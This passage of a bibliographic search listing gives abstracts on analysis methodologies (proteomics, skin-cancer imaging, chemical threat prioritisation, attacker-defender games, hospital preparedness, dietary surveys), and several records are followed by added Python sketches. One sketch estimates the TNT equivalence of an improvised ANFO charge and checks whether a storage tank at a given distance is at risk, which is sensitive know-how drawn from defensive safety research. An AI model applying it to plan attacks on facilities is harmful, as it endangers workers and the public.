    Protein abundance in quantitative proteomics is often based on observed spectral features derived from liquid chromatography mass spectrometry (LC-MS) or LC-MS/MS experiments. Peak intensities are largely non-normal in distribution. Furthermore, LC-MS-based proteomics data frequently have large proportions of missing peak intensities due to censoring mechanisms on low-abundance spectral features. Recognizing that the observed peak intensities detected with the LC-MS method are all positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon-Mann-Whitney rank sum tests, and the parametric survival model and accelerated failure time-model with log-normal, log-logistic and Weibull distributions were used to detect any differentially expressed proteins. The statistical operating characteristics of each method are explored using both real and simulated datasets. Survival methods generally have greater statistical power than standard differential expression methods when the proportion of missing protein level data is 5% or more. In particular, the AFT models we consider consistently achieve greater statistical power than standard testing procedures, with the discrepancy widening with increasing missingness in the proportions. The testing procedures discussed in this article can all be performed using readily available software such as R. The R codes are provided as supplemental materials. ctekwe@stat.tamu.edu.

  12. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data

    KAUST Repository

    Tekwe, C. D.

    2012-05-24

    MOTIVATION: Protein abundance in quantitative proteomics is often based on observed spectral features derived from liquid chromatography mass spectrometry (LC-MS) or LC-MS/MS experiments. Peak intensities are largely non-normal in distribution. Furthermore, LC-MS-based proteomics data frequently have large proportions of missing peak intensities due to censoring mechanisms on low-abundance spectral features. Recognizing that the observed peak intensities detected with the LC-MS method are all positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon-Mann-Whitney rank sum tests, and the parametric survival model and accelerated failure time-model with log-normal, log-logistic and Weibull distributions were used to detect any differentially expressed proteins. The statistical operating characteristics of each method are explored using both real and simulated datasets. RESULTS: Survival methods generally have greater statistical power than standard differential expression methods when the proportion of missing protein level data is 5% or more. In particular, the AFT models we consider consistently achieve greater statistical power than standard testing procedures, with the discrepancy widening with increasing missingness in the proportions. AVAILABILITY: The testing procedures discussed in this article can all be performed using readily available software such as R. The R codes are provided as supplemental materials. CONTACT: ctekwe@stat.tamu.edu.
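
    A hedged sketch of the core idea in the two records above: fitting a log-normal accelerated failure time (AFT) model to left-censored peak intensities by maximum likelihood, here with simulated data and scipy rather than the R code supplied by the authors. The detection limit, group sizes and effect size are assumptions for illustration.

    ```python
    import numpy as np
    from scipy import stats, optimize

    rng = np.random.default_rng(7)

    # Simulated peak intensities for one protein in two groups (0 = control,
    # 1 = treated); values below the detection limit are left-censored.
    n_per_group = 30
    group = np.repeat([0, 1], n_per_group)
    log_mu = 4.0 + 0.8 * group                     # true group effect on log scale
    intensity = np.exp(log_mu + 0.6 * rng.standard_normal(group.size))
    detection_limit = 40.0
    censored = intensity < detection_limit
    obs = np.where(censored, detection_limit, intensity)


    def neg_log_lik(params):
        """Log-normal AFT likelihood with left-censoring at the detection limit."""
        b0, b1, log_sigma = params
        sigma = np.exp(log_sigma)
        mu = b0 + b1 * group
        z = (np.log(obs) - mu) / sigma
        # Observed values contribute the log-normal density, censored values
        # contribute P(intensity <= detection limit).
        ll_obs = stats.norm.logpdf(z[~censored]) - np.log(sigma) - np.log(obs[~censored])
        ll_cen = stats.norm.logcdf(z[censored])
        return -(ll_obs.sum() + ll_cen.sum())


    fit = optimize.minimize(neg_log_lik, x0=[np.log(obs).mean(), 0.0, 0.0],
                            method="Nelder-Mead")
    b0_hat, b1_hat, log_sigma_hat = fit.x
    print(f"estimated group effect on log intensity: {b1_hat:.3f}")
    ```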

  13. Systemic design methodologies for electrical energy systems analysis, synthesis and management

    CERN Document Server

    Roboam, Xavier

    2012-01-01

    This book proposes systemic design methodologies applied to electrical energy systems, in particular analysis and system management, modeling and sizing tools. It includes 8 chapters: after an introduction to the systemic approach (history, basics & fundamental issues, index terms) for designing energy systems, this book presents two different graphical formalisms especially dedicated to multidisciplinary devices modeling, synthesis and analysis: Bond Graph and COG/EMR. Other systemic analysis approaches for quality and stability of systems, as well as for safety and robustness analysis tools are also proposed. One chapter is dedicated to energy management and another is focused on Monte Carlo algorithms for electrical systems and networks sizing. The aim of this book is to summarize design methodologies based in particular on a systemic viewpoint, by considering the system as a whole. These methods and tools are proposed by the most important French research laboratories, which have many scientific partn...

  14. Methodology for diagnosing of skin cancer on images of dermatologic spots by spectral analysis.

    Science.gov (United States)

    Guerra-Rosas, Esperanza; Álvarez-Borrego, Josué

    2015-10-01

    In this paper, a new methodology for the diagnosis of skin cancer on images of dermatologic spots using image processing is presented. Currently, skin cancer is one of the most frequent diseases in humans. This methodology is based on Fourier spectral analysis using filters such as the classic, inverse and k-law nonlinear filters. The sample images were obtained by a medical specialist, and a new spectral technique was developed to obtain a quantitative measurement of the complex pattern found in cancerous skin spots. Finally, a spectral index is calculated to obtain a range of spectral indices defined for skin cancer. Our results show a confidence level of 95.4%.
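
    A hedged sketch of the general approach: transform a lesion image to the Fourier domain, apply a k-law nonlinearity to the magnitude spectrum, and summarise the result as a single scalar index. The k value, the low-frequency radius and the index definition below are illustrative assumptions; the paper's exact filters and diagnostic index ranges differ.

    ```python
    import numpy as np


    def k_law_filter(image, k=0.3):
        """Apply a k-law nonlinearity to the image spectrum: keep the phase and
        raise the magnitude to the power k (0 < k < 1 flattens the spectrum)."""
        spectrum = np.fft.fft2(image)
        magnitude, phase = np.abs(spectrum), np.angle(spectrum)
        return magnitude ** k * np.exp(1j * phase)


    def spectral_index(image, k=0.3):
        """Illustrative scalar descriptor: the fraction of filtered spectral
        energy outside the lowest spatial frequencies (complex lesion patterns
        push energy towards higher frequencies)."""
        filtered = np.fft.fftshift(k_law_filter(image, k))
        energy = np.abs(filtered) ** 2
        cy, cx = np.array(energy.shape) // 2
        r = min(cy, cx) // 8                      # assumed "low-frequency" radius
        low = energy[cy - r:cy + r, cx - r:cx + r].sum()
        return 1.0 - low / energy.sum()


    rng = np.random.default_rng(0)
    smooth_spot = np.outer(np.hanning(128), np.hanning(128))
    irregular_spot = smooth_spot + 0.3 * rng.random((128, 128))
    print(f"smooth   : {spectral_index(smooth_spot):.3f}")
    print(f"irregular: {spectral_index(irregular_spot):.3f}")
    ```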

  15. Methodology for national risk analysis and prioritization of toxic industrial chemicals.

    Science.gov (United States)

    Taxell, Piia; Engström, Kerstin; Tuovila, Juha; Söderström, Martin; Kiljunen, Harri; Vanninen, Paula; Santonen, Tiina

    2013-01-01

    The identification of chemicals that pose the greatest threat to human health from incidental releases is a cornerstone in public health preparedness for chemical threats. The present study developed and applied a methodology for the risk analysis and prioritization of industrial chemicals to identify the most significant chemicals that pose a threat to public health in Finland. The prioritization criteria included acute and chronic health hazards, physicochemical and environmental hazards, national production and use quantities, the physicochemical properties of the substances, and the history of substance-related incidents. The presented methodology enabled a systematic review and prioritization of industrial chemicals for the purpose of national public health preparedness for chemical incidents.

  16. Application of a new methodology on the multicycle analysis for the Laguna Verde NPP en Mexico

    International Nuclear Information System (INIS)

    Cortes C, Carlos C.

    1997-01-01

    This paper describes the improvements made in the physical and economic methodologies for the multicycle analysis of the Boiling Water Reactors of the Laguna Verde NPP in Mexico, based on commercial codes and in-house developed computational tools. With these changes in the methodology, three feasible scenarios are generated for the operation of Laguna Verde Nuclear Power Plant Unit 2 with 12-, 18- and 24-month cycle lengths. The physical and economic results obtained are shown. Further, the effect of replacement power is included in the economic evaluation. (author). 11 refs., 3 figs., 7 tabs

  17. Defense and attack of complex and dependent systems

    International Nuclear Information System (INIS)

    Hausken, Kjell

    2010-01-01

    A framework is constructed for how to analyze the strategic defense of an infrastructure subject to attack by a strategic attacker. Merging operations research, reliability theory, and game theory for optimal analytical impact, the optimization program for the defender and attacker is specified. Targets can be in parallel, series, combined series-parallel, complex, k-out-of-n redundancy, independent, interdependent, and dependent. The defender and attacker determine how much to invest in defending versus attacking each of multiple targets. A target can have economic, human, and symbolic values, subjectively assessed by the defender and attacker. A contest success function determines the probability of a successful attack on each target, dependent on the investments by the defender and attacker into each target, and on characteristics of the contest. The defender minimizes the expected damage plus the defense costs. The attacker maximizes the expected damage minus the attack costs. Each agent is concerned about how his investments vary across the targets, and the impact on his utilities. Interdependent systems are analyzed where the defense and attack on one target impacts all targets. Dependent systems are analyzed applying Markov analysis and repeated games where a successful attack on one target in the first period impacts the unit costs of defense and attack, and the contest intensity, for the other target in the second period.

  18. Defense and attack of complex and dependent systems

    Energy Technology Data Exchange (ETDEWEB)

    Hausken, Kjell, E-mail: kjell.hausken@uis.n [Faculty of Social Sciences, University of Stavanger, N-4036 Stavanger (Norway)]

    2010-01-15

    A framework is constructed for how to analyze the strategic defense of an infrastructure subject to attack by a strategic attacker. Merging operations research, reliability theory, and game theory for optimal analytical impact, the optimization program for the defender and attacker is specified. Targets can be in parallel, series, combined series-parallel, complex, k-out-of-n redundancy, independent, interdependent, and dependent. The defender and attacker determine how much to invest in defending versus attacking each of multiple targets. A target can have economic, human, and symbolic values, subjectively assessed by the defender and attacker. A contest success function determines the probability of a successful attack on each target, dependent on the investments by the defender and attacker into each target, and on characteristics of the contest. The defender minimizes the expected damage plus the defense costs. The attacker maximizes the expected damage minus the attack costs. Each agent is concerned about how his investments vary across the targets, and the impact on his utilities. Interdependent systems are analyzed where the defense and attack on one target impacts all targets. Dependent systems are analyzed applying Markov analysis and repeated games where a successful attack on one target in the first period impacts the unit costs of defense and attack, and the contest intensity, for the other target in the second period.
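
    A minimal sketch of the expected-utility bookkeeping described in the two records above, using the ratio-form contest success function that is common in this literature; whether that exact functional form is the one adopted in the paper is not claimed, and the target values, efforts and contest intensity below are illustrative.

    ```python
    def attack_success_probability(attack_effort, defense_effort, intensity=1.0):
        """Ratio-form contest success function: p = A^m / (A^m + D^m),
        where m is the contest intensity."""
        if attack_effort == 0 and defense_effort == 0:
            return 0.5
        a = attack_effort ** intensity
        d = defense_effort ** intensity
        return a / (a + d)


    def expected_utilities(targets, intensity=1.0):
        """targets: list of dicts with the asset value and the efforts (in the
        same monetary units) invested by each agent on that target."""
        defender_u, attacker_u = 0.0, 0.0
        for t in targets:
            p = attack_success_probability(t["attack"], t["defense"], intensity)
            damage = p * t["value"]
            defender_u -= damage + t["defense"]   # expected damage + defense cost
            attacker_u += damage - t["attack"]    # expected damage - attack cost
        return defender_u, attacker_u


    # Two independent targets in parallel (illustrative values).
    targets = [
        {"value": 100.0, "defense": 10.0, "attack": 5.0},
        {"value": 40.0,  "defense": 2.0,  "attack": 8.0},
    ]
    print(expected_utilities(targets, intensity=1.0))
    ```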

  19. THEORETICAL AND METHODOLOGICAL PRINCIPLES OF THE STRATEGIC FINANCIAL ANALYSIS OF CAPITAL

    Directory of Open Access Journals (Sweden)

    Olha KHUDYK

    2016-07-01

    Full Text Available The article is devoted to the theoretical and methodological principles of strategic financial analysis of capital. The necessity of strategic financial analysis of capital as a methodological basis for study strategies is proved in modern conditions of a high level of dynamism, uncertainty and risk. The methodological elements of the strategic financial analysis of capital (the object of investigation, the indicators, the factors, the methods of study, the subjects of analysis, the sources of incoming and outgoing information) are justified in the system of financial management, allowing to improve its theoretical foundations. It is proved that the strategic financial analysis of capital is a continuous process, carried out in an appropriate sequence at each stage of capital circulation. The system of indexes is substantiated, based on the needs of the strategic financial analysis. The classification of factors determining the size and structure of company’s capital is grounded. The economic nature of capital of the company is clarified. We consider that capital is a stock of economic resources in the form of cash, tangible and intangible assets accumulated by savings, which is used by its owner as a factor of production and investment resource in the economic process in order to obtain profit, to ensure the growth of owners’ prosperity and to achieve social effect.

  20. Chemical or Biological Terrorist Attacks: An Analysis of the Preparedness of Hospitals for Managing Victims Affected by Chemical or Biological Weapons of Mass Destruction

    Science.gov (United States)

    Bennett, Russell L.

    2006-01-01

    The possibility of a terrorist attack employing the use of chemical or biological weapons of mass destruction (WMD) on American soil is no longer an empty threat; it has become a reality. A WMD is defined as any weapon with the capacity to inflict death and destruction on such a massive scale that its very presence in the hands of hostile forces is a grievous threat. Events of the past few years, including the bombing of the World Trade Center in 1993 and the Murrah Federal Building in Oklahoma City in 1995, the use of planes as guided missiles directed into the Pentagon and New York’s Twin Towers in 2001 (9/11), and the tragic incidents involving twenty-three people who were infected and five who died as a result of contact with anthrax-laced mail in the fall of 2001, have well established that the United States can be attacked by both domestic and international terrorists without warning or provocation. In light of these actions, hospitals have been working vigorously to ensure that they would be “ready” in the event of another terrorist attack to provide appropriate medical care to victims. However, according to a recent United States General Accounting Office (GAO) nationwide survey, our nation’s hospitals still are not prepared to manage mass casualties resulting from chemical or biological WMD. Therefore, there is a clear need for information about current hospital preparedness in order to provide a foundation for systematic planning and broader discussions about relative cost, probable effectiveness, environmental impact and overall societal priorities. Hence, the aim of this research was to examine the current preparedness of hospitals in the State of Mississippi to manage victims of terrorist attacks involving chemical or biological WMD. All acute care hospitals in the State were selected for inclusion in this study. Both quantitative and qualitative methods were utilized for data collection and analysis. Six hypotheses were tested. Using a

  1. An efficient methodology for the analysis of primary frequency control of electric power systems

    Energy Technology Data Exchange (ETDEWEB)

    Popovic, D.P. [Nikola Tesla Institute, Belgrade (Yugoslavia)]; Mijailovic, S.V. [Electricity Coordinating Center, Belgrade (Yugoslavia)]

    2000-06-01

    The paper presents an efficient methodology for the analysis of primary frequency control of electric power systems. This methodology continuously monitors the electromechanical transient processes with durations that last up to 30 s, occurring after the characteristic disturbances. It covers the period of short-term dynamic processes, appearing immediately after the disturbance, in which the dynamics of the individual synchronous machines is dominant, as well as the period with the uniform movement of all generators and restoration of their voltages. The characteristics of the developed methodology were determined based on the example of real electric power interconnection formed by the electric power systems of Yugoslavia, a part of Republic of Srpska, Romania, Bulgaria, former Yugoslav Republic of Macedonia, Greece and Albania (the second UCPTE synchronous zone). (author)

  2. Vulnerability of industrial facilities to attacks with improvised explosive devices aimed at triggering domino scenarios

    International Nuclear Information System (INIS)

    Landucci, Gabriele; Reniers, Genserik; Cozzani, Valerio; Salzano, Ernesto

    2015-01-01

    Process and chemical plants may constitute a critical target for a terrorist attack. In the present study, the analysis of industrial accidents induced by intentional acts of interference is carried out, focusing on accident chains triggered by attacks with home-made (improvised) explosives. The effects of blast waves caused by improvised explosive devices are compared with those expected from a net equivalent charge of TNT by using a specific methodology for the assessment of stand-off distances. It is demonstrated that a home-made explosive device has a TNT efficiency between 0.2 and 0.5. The model was applied to a case study, demonstrating the potential of improvised explosives to cause accident escalation sequences and severe effects on population and assets. The analysis of the case study also allowed suggestions to be derived for adequate security management. - Highlights: • Improvised explosives possibly used for terrorist attacks were described. • The TNT efficiency of ANFO and TATP was characterized. • Domino effects caused by an attack with improvised explosives were analyzed. • Domino scenarios induced by an attack were compared to conventional scenarios
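
    A small sketch of the TNT-equivalence step: converting a home-made charge to an equivalent TNT mass with the reported 0.2-0.5 efficiency range, and entering the usual cube-root (Hopkinson-Cranz) scaled distance used for stand-off assessments. The vulnerability threshold of 4 m/kg^(1/3) and the charge and stand-off values are illustrative assumptions, not figures from the study.

    ```python
    def tnt_equivalent_mass(charge_mass_kg, tnt_efficiency):
        """Equivalent TNT mass of a home-made charge; the record reports
        efficiencies of roughly 0.2-0.5 for improvised explosives."""
        return tnt_efficiency * charge_mass_kg


    def scaled_distance(stand_off_m, tnt_mass_kg):
        """Hopkinson-Cranz scaled distance Z = R / W^(1/3), in m/kg^(1/3),
        the usual entry point into blast-damage charts."""
        return stand_off_m / tnt_mass_kg ** (1.0 / 3.0)


    def target_at_risk(stand_off_m, charge_mass_kg, tnt_efficiency,
                       damage_threshold_z=4.0):
        """Crude screening check; the threshold scaled distance below which a
        process vessel is assumed vulnerable to escalation (4 m/kg^(1/3)) is
        an illustrative assumption."""
        w = tnt_equivalent_mass(charge_mass_kg, tnt_efficiency)
        return scaled_distance(stand_off_m, w) < damage_threshold_z


    # 500 kg ANFO-type device parked 20 m from a storage tank (illustrative).
    for eta in (0.2, 0.5):
        z = scaled_distance(20.0, tnt_equivalent_mass(500.0, eta))
        print(f"efficiency {eta}: Z = {z:.1f} m/kg^(1/3), "
              f"at risk: {target_at_risk(20.0, 500.0, eta)}")
    ```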

  3. Methodology for Risk Analysis of Dam Gates and Associated Operating Equipment Using Fault Tree Analysis

    National Research Council Canada - National Science Library

    Patev, Robert C; Putcha, Chandra; Foltz, Stuart D

    2005-01-01

    .... This report summarizes research on methodologies to assist in quantifying risks related to dam gates and associated operating equipment, and how those risks relate to overall spillway failure risk...

  4. Best-estimate methodology for analysis of anticipated transients without scram in pressurized water reactors

    International Nuclear Information System (INIS)

    Rebollo, L.

    1993-01-01

    Union Fenosa, a utility company in Spain, has performed research on pressurized water reactor (PWR) safety with respect to the development of a best-estimate methodology for the analysis of anticipated transients without scram (ATWS), i.e., those anticipated transients for which failure of the reactor protection system is postulated. A scientific and technical approach is adopted with respect to the ATWS phenomenon as it affects a PWR, specifically the Zorita nuclear power plant, a single-loop Westinghouse-designed PWR in Spain. In this respect, an ATWS sequence analysis methodology based on published codes that is generically applicable to any PWR is proposed, which covers all the anticipated phenomena and defines the applicable acceptance criteria. The areas contemplated are cell neutron analysis, core thermal hydraulics, and plant dynamics, which are developed, qualified, and validated by comparison with reference calculations and measurements obtained from integral or separate-effects tests

  5. Methodology for the analysis of dietary data from the Mexican National Health and Nutrition Survey 2006.

    Science.gov (United States)

    Rodríguez-Ramírez, Sonia; Mundo-Rosas, Verónica; Jiménez-Aguilar, Alejandra; Shamah-Levy, Teresa

    2009-01-01

    To describe the methodology for the analysis of dietary data from the Mexican National Health and Nutrition Survey 2006 (ENSANUT 2006) carried out in Mexico. Dietary data from the population who participated in the ENSANUT 2006 were collected through a 7-day food-frequency questionnaire. Energy and nutrient intake of each food consumed and adequacy percentage by day were also estimated. Intakes and adequacy percentages > 5 SDs from the energy and nutrient general distribution and observations with energy adequacy percentages < 25% were excluded from the analysis. Valid dietary data were obtained from 3552 children aged 1 to 4 years, 8716 children aged 5 to 11 years, 8442 adolescents, 15951 adults, and 3357 older adults. It is important to detail the methodology for the analysis of dietary data to standardize data cleaning criteria and to be able to compare the results of different studies.
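
    A hedged sketch of the two exclusion rules stated in this record, expressed with pandas; the variable names, the reference means and standard deviations, and the one-sided reading of the 5-SD rule are assumptions for illustration, not the ENSANUT 2006 data dictionary.

    ```python
    import pandas as pd

    # Hypothetical variable names and reference statistics; the actual ENSANUT
    # 2006 variable names and distribution parameters differ.
    diet = pd.DataFrame({
        "subject_id": [1, 2, 3, 4, 5],
        "energy_kcal": [1800.0, 2200.0, 15000.0, 950.0, 2100.0],
        "energy_adequacy_pct": [90.0, 105.0, 600.0, 20.0, 98.0],
    })

    # Mean and SD of the overall survey distribution (assumed values).
    reference_stats = {
        "energy_kcal": (2000.0, 800.0),
        "energy_adequacy_pct": (100.0, 40.0),
    }


    def apply_cleaning_rules(df, stats, adequacy_col="energy_adequacy_pct"):
        """Apply the two exclusion rules described in the record:
        (1) drop values more than 5 SD beyond the overall survey distribution;
        (2) drop observations with energy adequacy below 25%."""
        keep = pd.Series(True, index=df.index)
        for col, (mean, sd) in stats.items():
            keep &= df[col] <= mean + 5 * sd
        keep &= df[adequacy_col] >= 25.0
        return df[keep]


    clean = apply_cleaning_rules(diet, reference_stats)
    print(clean["subject_id"].tolist())   # [1, 2, 5]: outlier and <25% case dropped
    ```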

  6. Analysis methodology for the post-trip return to power steam line break event

    Energy Technology Data Exchange (ETDEWEB)

    Lee, Chul Shin; Kim, Chul Woo; You, Hyung Keun [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)]

    1996-06-01

    An analysis of Steam Line Break (SLB) events that result in a Return-to-Power (RTP) condition after reactor trip was performed for a postulated Yonggwang Nuclear Power Plant Unit 3 cycle 8. The analysis methodology for post-trip RTP SLB is quite different from that for non-RTP SLB and is more difficult. Therefore, it is necessary to develop a methodology to analyze the response of the NSSS parameters to post-trip RTP SLB events and the fuel performance after the total reactivity exceeds criticality. In this analysis, the cases with and without offsite power were simulated crediting the 3-D reactivity feedback effect due to local heatup in the vicinity of the stuck CEA, and compared with the cases without 3-D reactivity feedback with respect to post-trip fuel performance, Departure from Nucleate Boiling Ratio (DNBR) and Linear Heat Generation Rate (LHGR). 36 tabs., 32 figs., 11 refs. (Author)

  7. Accidental safety analysis methodology development in decommission of the nuclear facility

    Energy Technology Data Exchange (ETDEWEB)

    Park, G. H.; Hwang, J. H.; Jae, M. S.; Seong, J. H.; Shin, S. H.; Cheong, S. J.; Pae, J. H.; Ang, G. R.; Lee, J. U. [Seoul National Univ., Seoul (Korea, Republic of)]

    2002-03-15

    Decontamination and Decommissioning (D and D) of a nuclear reactor costs about 20% of the construction expense, and the production of nuclear wastes during decommissioning raises environmental issues. Decommissioning of nuclear reactors in Korea is just beginning, and clear standards and regulations for decommissioning are lacking. This work on accident safety analysis in the decommissioning of nuclear facilities can provide a solid basis for such standards and regulations. For the source term analysis of the Kori-1 reactor vessel, an MCNP/ORIGEN calculation methodology was applied. The activity of each important nuclide in the vessel was estimated at times after 2008, the year the Kori-1 plant is supposed to be decommissioned. In addition, a methodology for risk assessment in decommissioning was developed.

  8. More Than Just a Discursive Practice? Conceptual Principles and Methodological Aspects of Dispositif Analysis

    Directory of Open Access Journals (Sweden)

    Andrea D. Bührmann

    2007-05-01

    Full Text Available This article gives an introduction to the conceptual and practical field of dispositif analysis—a field that is of great importance but that is as yet underdeveloped. To provide this introduction, we first explain the terms discourse and dispositif. Then we examine the conceptual instruments and methodological procedures of dispositif analysis. In this way, we define the relations between discourse and (a) non-discursive practices, (b) subjectification, (c) everyday orders of knowledge and (d) institutional practices like societal changes as central issues of dispositif analysis. Furthermore, we point out the methodological possibilities and limitations of dispositif analysis. We demonstrate these possibilities and limitations with some practical examples. In general, this article aims to provide an extension of the perspectives of discourse theory and research by stressing the relations between normative orders of knowledge, their effects on interactions, and the individual self-reflections connected with them. URN: urn:nbn:de:0114-fqs0702281

  9. Cyber Attacks, Information Attacks, and Postmodern Warfare

    Directory of Open Access Journals (Sweden)

    Valuch Jozef

    2017-06-01

    Full Text Available The aim of this paper is to evaluate and differentiate between the phenomena of cyberwarfare and information warfare, as manifestations of what we perceive as postmodern warfare. We describe and analyse current examples of the use of postmodern warfare and the reactions of states and international bodies to these phenomena. The subject matter of this paper is the relationship between new types of postmodern conflicts and the law of armed conflicts (law of war). Based on ICJ case law, it is clear that under the current legal rules of the international law of war, cyber attacks as well as information attacks (often performed in cyberspace as well) can only be perceived as “war” if executed in addition to classical kinetic warfare, which is often not the case. In most cases perceived “only” as non-linear warfare (postmodern conflict), this practice must nevertheless be condemned as conduct contrary to the principles of international law and (possibly) a crime under national laws, unless this type of conduct comes to be recognized by the international community as a “war” proper, in its new, postmodern sense.

  10. THEORETICAL AND METHODOLOGICAL PRINCIPLES OF THE STRATEGIC FINANCIAL ANALYSIS OF CAPITAL

    Directory of Open Access Journals (Sweden)

    Olha KHUDYK

    2016-07-01

    Full Text Available The article is devoted to the theoretical and methodological principles of strategic financial analysis of capital. The necessity of strategic financial analysis of capital as a methodological basis for study strategies is proved in modern conditions of a high level of dynamism, uncertainty and risk. The methodological elements of the strategic financial analysis of capital (the object of investigation, the indicators, the factors, the methods of study, the subjects of analysis, the sources of incoming and outgoing information) are justified in the system of financial management, allowing to improve its theoretical foundations. It is proved that the strategic financial analysis of capital is a continuous process, carried out in an appropriate sequence at each stage of capital circulation. The system of indexes is substantiated, based on the needs of the strategic financial analysis. The classification of factors determining the size and structure of company’s capital is grounded. The economic nature of capital of the company is clarified. We consider that capital is a stock of economic resources in the form of cash, tangible and intangible assets accumulated by savings, which is used by its owner as a factor of production and investment resource in the economic process in order to obtain profit, to ensure the growth of owners’ prosperity and to achieve social effect.

  11. A Methodology for the Development of RESTful Semantic Web Services for Gene Expression Analysis.

    Science.gov (United States)

    Guardia, Gabriela D A; Pires, Luís Ferreira; Vêncio, Ricardo Z N; Malmegrim, Kelen C R; de Farias, Cléver R G

    2015-01-01

    Gene expression studies are generally performed through multi-step analysis processes, which require the integrated use of a number of analysis tools. In order to facilitate tool/data integration, an increasing number of analysis tools have been developed as or adapted to semantic web services. In recent years, some approaches have been defined for the development and semantic annotation of web services created from legacy software tools, but these approaches still present many limitations. In addition, to the best of our knowledge, no suitable approach has been defined for the functional genomics domain. Therefore, this paper aims at defining an integrated methodology for the implementation of RESTful semantic web services created from gene expression analysis tools and the semantic annotation of such services. We have applied our methodology to the development of a number of services to support the analysis of different types of gene expression data, including microarray and RNASeq. All developed services are publicly available in the Gene Expression Analysis Services (GEAS) Repository at http://dcm.ffclrp.usp.br/lssb/geas. Additionally, we have used a number of the developed services to create different integrated analysis scenarios to reproduce parts of two gene expression studies documented in the literature. The first study involves the analysis of one-color microarray data obtained from multiple sclerosis patients and healthy donors. The second study comprises the analysis of RNA-Seq data obtained from melanoma cells to investigate the role of the remodeller BRG1 in the proliferation and morphology of these cells. Our methodology provides concrete guidelines and technical details in order to facilitate the systematic development of semantic web services. Moreover, it encourages the development and reuse of these services for the creation of semantically integrated solutions for gene expression analysis.
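    For illustration, consuming a RESTful analysis service of the kind described can be sketched as an HTTP request from Python. Only the repository base address below comes from the abstract; the service path, parameters, and dataset URL are hypothetical placeholders, not documented GEAS endpoints.

    ```python
    import requests

    # Base address taken from the abstract; everything below it is illustrative only.
    BASE_URL = "http://dcm.ffclrp.usp.br/lssb/geas"

    def call_analysis_service(service_path, payload):
        """POST an analysis request to a RESTful gene expression service (hypothetical endpoint)."""
        response = requests.post(f"{BASE_URL}/{service_path}", json=payload, timeout=60)
        response.raise_for_status()
        return response.json()

    # Hypothetical usage: submit a normalization step for microarray data.
    result = call_analysis_service(
        "normalize",  # assumed service name, not taken from the paper
        {"dataset_url": "http://example.org/ms_microarray.csv", "method": "quantile"},
    )
    print(result)
    ```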

  12. A Methodology for the Development of RESTful Semantic Web Services for Gene Expression Analysis.

    Directory of Open Access Journals (Sweden)

    Gabriela D A Guardia

    Full Text Available Gene expression studies are generally performed through multi-step analysis processes, which require the integrated use of a number of analysis tools. In order to facilitate tool/data integration, an increasing number of analysis tools have been developed as or adapted to semantic web services. In recent years, some approaches have been defined for the development and semantic annotation of web services created from legacy software tools, but these approaches still present many limitations. In addition, to the best of our knowledge, no suitable approach has been defined for the functional genomics domain. Therefore, this paper aims at defining an integrated methodology for the implementation of RESTful semantic web services created from gene expression analysis tools and the semantic annotation of such services. We have applied our methodology to the development of a number of services to support the analysis of different types of gene expression data, including microarray and RNA-Seq. All developed services are publicly available in the Gene Expression Analysis Services (GEAS) Repository at http://dcm.ffclrp.usp.br/lssb/geas. Additionally, we have used a number of the developed services to create different integrated analysis scenarios to reproduce parts of two gene expression studies documented in the literature. The first study involves the analysis of one-color microarray data obtained from multiple sclerosis patients and healthy donors. The second study comprises the analysis of RNA-Seq data obtained from melanoma cells to investigate the role of the remodeller BRG1 in the proliferation and morphology of these cells. Our methodology provides concrete guidelines and technical details in order to facilitate the systematic development of semantic web services. Moreover, it encourages the development and reuse of these services for the creation of semantically integrated solutions for gene expression analysis.

  13. Seven Deadliest Wireless Technologies Attacks

    CERN Document Server

    Haines, Brad

    2010-01-01

    How can an information security professional keep up with all of the hacks, attacks, and exploits? One way to find out what the worst of the worst are is to read the seven books in our Seven Deadliest Attacks Series. Not only do we let you in on the anatomy of these attacks, but we also tell you how to get rid of them and how to defend against them in the future. Countermeasures are detailed so that you can fight against similar attacks as they evolve. Attacks featured in this book include: Bluetooth Attacks; Credit Card, Access Card, and Passport Attacks; Bad Encryption.

  14. Summary of the Supplemental Model Reports Supporting the Disposal Criticality Analysis Methodology Topical Report

    International Nuclear Information System (INIS)

    Brownson, D. A.

    2002-01-01

    The Department of Energy (DOE) Office of Civilian Radioactive Waste Management (OCRWM) has committed to a series of model reports documenting the methodology to be utilized in the Disposal Criticality Analysis Methodology Topical Report (YMP 2000). These model reports detail and provide validation of the methodology to be utilized for criticality analyses related to: (1) Waste form/waste package degradation; (2) Waste package isotopic inventory; (3) Criticality potential of degraded waste form/waste package configurations (effective neutron multiplication factor); (4) Probability of criticality (for each potential critical configuration as well as total event); and (5) Criticality consequences. The purpose of this summary report is to provide a status of the model reports and a schedule for their completion. This report also provides information relative to the model report content and validation. The model reports and their revisions are being generated as a result of: (1) Commitments made in the Disposal Criticality Analysis Methodology Topical Report (YMP 2000); (2) Open Items from the Safety Evaluation Report (Reamer 2000); (3) Key Technical Issue agreements made during DOE/U.S. Nuclear Regulatory Commission (NRC) Technical Exchange Meeting (Reamer and Williams 2000); and (4) NRC requests for additional information (Schlueter 2002)

  15. Application of NASA Kennedy Space Center system assurance analysis methodology to nuclear power plant systems designs

    International Nuclear Information System (INIS)

    Page, D.W.

    1985-01-01

    The Kennedy Space Center (KSC) entered into an agreement with the Nuclear Regulatory Commission (NRC) to conduct a study to demonstrate the feasibility and practicality of applying the KSC System Assurance Analysis (SAA) methodology to nuclear power plant systems designs. In joint meetings of KSC and Duke Power personnel, an agreement was made to select two CATAWBA systems, the Containment Spray System and the Residual Heat Removal System, for the analyses. Duke Power provided KSC with a full set of Final Safety Analysis Reports as well as schematics for the two systems. During Phase I of the study the reliability analyses of the SAA were performed. During Phase II the hazard analyses were performed. The final product of Phase II is a handbook for implementing the SAA methodology into nuclear power plant systems designs. The purpose of this paper is to describe the SAA methodology as it applies to nuclear power plant systems designs and to discuss the feasibility of its application. The conclusion is drawn that nuclear power plant systems and aerospace ground support systems are similar in complexity and design and share common safety and reliability goals. The SAA methodology is readily adaptable to nuclear power plant designs because of its practical application of existing and well-known safety and reliability analytical techniques tied to an effective management information system

  16. Data development technical support document for the aircraft crash risk analysis methodology (ACRAM) standard

    International Nuclear Information System (INIS)

    Kimura, C.Y.; Glaser, R.E.; Mensing, R.W.; Lin, T.; Haley, T.A.; Barto, A.B.; Stutzke, M.A.

    1996-01-01

